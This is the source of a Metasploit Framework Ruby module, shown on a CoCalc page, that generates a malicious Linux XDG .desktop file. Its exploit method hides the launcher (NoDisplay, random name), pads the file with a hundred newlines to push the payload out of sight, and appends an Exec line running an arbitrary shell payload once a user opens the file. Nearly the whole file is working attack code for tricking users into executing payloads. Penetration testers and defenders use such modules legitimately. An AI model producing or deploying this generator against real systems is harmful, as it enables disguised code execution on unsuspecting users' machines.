Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/xdg_desktop.rb
21089 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Malicious XDG Desktop File',

16
        'Description' => %q{

17
          This module creates a malicious XDG Desktop (.desktop) file.

18


19
          On most modern systems, desktop files are not trusted by default.

20
          The user will receive a warning prompt that the file is not trusted

21
          when running the file, but may choose to run the file anyway.

22


23
          The default file manager applications in some desktop environments

24
          may impose more strict execution requirements by prompting the user

25
          to set the file as executable and/or marking the file as trusted

26
          before the file can be executed.

27
        },

28
        'Author' => [

29
          'bcoles'

30
        ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],

34
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],

35
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],

36
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']

37
        ],

38
        'Platform' => %w[linux unix solaris freebsd],

39
        'Arch' => [ARCH_CMD],

40
        'Targets' => [

41
          [ 'Automatic', {} ]

42
        ],

43
        'DefaultTarget' => 0,

44
        'Privileged' => false,

45
        'DisclosureDate' => '2007-02-06',

46
        'Notes' => {

47
          'Stability' => [CRASH_SAFE],

48
          'Reliability' => [REPEATABLE_SESSION],

49
          'SideEffects' => [SCREEN_EFFECTS]

50
        }

51
      )

52
    )

53


54
    register_options([

55
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),

56
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),

57
    ])

58


59
    register_advanced_options([

60
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),

61
    ])

62
  end

63


64
  def application_name

65
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']

66
  end

67


68
  def exploit

69
    values = [

70
      'Type=Application',

71
      "Name=#{application_name}",

72
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution

73
      'NoDisplay=true',

74
      'Terminal=false'

75
    ]

76
    desktop = "[Desktop Entry]\n"

77
    desktop << values.shuffle.join("\n")

78
    desktop << "\n"

79
    desktop << "\n" * datastore['PrependNewLines']

80


81
    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')

82
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

83


84
    file_create(desktop)

85
  end

86
end

87


88